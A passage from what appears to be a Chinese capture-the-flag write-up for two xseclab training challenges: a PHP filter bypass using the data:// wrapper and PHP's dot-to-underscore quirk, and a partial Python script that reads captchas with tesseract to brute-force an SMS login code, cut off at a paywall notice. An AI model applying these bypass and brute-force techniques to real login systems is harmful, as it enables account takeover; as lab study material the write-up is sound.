1、脚本关:微笑一下,过关地址:http://lab1.xseclab.com/base13_ead1b12e47ec7cc5390303831b779d47/index.php
查看源代码:
include('flag.php');
$smile = 1;
if (!isset ($_GET['^_^'])) $smile = 0;
if (preg_match ('/\./', $_GET['^_^'])) $smile = 0;
if (preg_match ('/%/', $_GET['^_^'])) $smile = 0;
if (preg_match ('/[0-9]/', $_GET['^_^'])) $smile = 0;
if (preg_match ('/http/', $_GET['^_^']) ) $smile = 0;
if (preg_match ('/https/', $_GET['^_^']) ) $smile = 0;
if (preg_match ('/ftp/', $_GET['^_^'])) $smile = 0;
if (preg_match ('/telnet/', $_GET['^_^'])) $smile = 0;
if (preg_match ('/_/', $_SERVER['QUERY_STRING'])) $smile = 0;
if ($smile) {
if (@file_exists ($_GET['^_^'])) $smile = 0;
}
if ($smile) {
$smile = @file_get_contents ($_GET['^_^']);
if ($smile === "(●'◡'●)") die($flag);
} 显然参数为^^=(●’◡’●),但QUERY_STRING过滤了‘’,且文件不能存在,但可以读取文件内容,前面又过滤了一堆http、ftp等。因PHP自动回替换.为_,使用data协议,构造参数为:?^.^=data://text/plain;charset=unicode,(●’◡’●)
2、脚本关:验证码识别并进行手机验证码爆破 http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/index.php#
提交之前需先点一下获取验证码,查看提交后的header,取得cookie,提交的参数。
识别验证码可用tesseract,代码如下:
#!/usr/bin/python
# -*- coding: utf-8 -*-
import requests #调用url、cookie操作 文件操作的库
import sys
import time
from pytesseract import *
from PIL import Image
def vcode(pic_url,cookies):
"python验证码识别函数"
r = requests.get(pic_url, cookies=cookies, timeout=10)
with open('vcode.png', 'wb') as pic:
pic.write(r.content)
image=Image.open('vcode.png')
im = image_to_string(image)
#print im
im = im.replace(' ', '')
if im.isdigit() and len(im)==4:
return im
else:
return vcode(pic_url,cookies)
cookies = {
'saeut': '14.19.157.117.1435504248010840','PHPSESSID':'2cec394dbfba709823daea4ba71eb04a'}
payload = {
'username': '13388886666', 'mobi_code': '100','user_code':'5053','Login':'submit'}
#headers = {'user-agent': 'my-app/0.0.1'}
picurl='http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/vcode.php'
url="http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/login.php"
#filename = u"D:/User
最低0.47元/天 解锁文章
4729
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
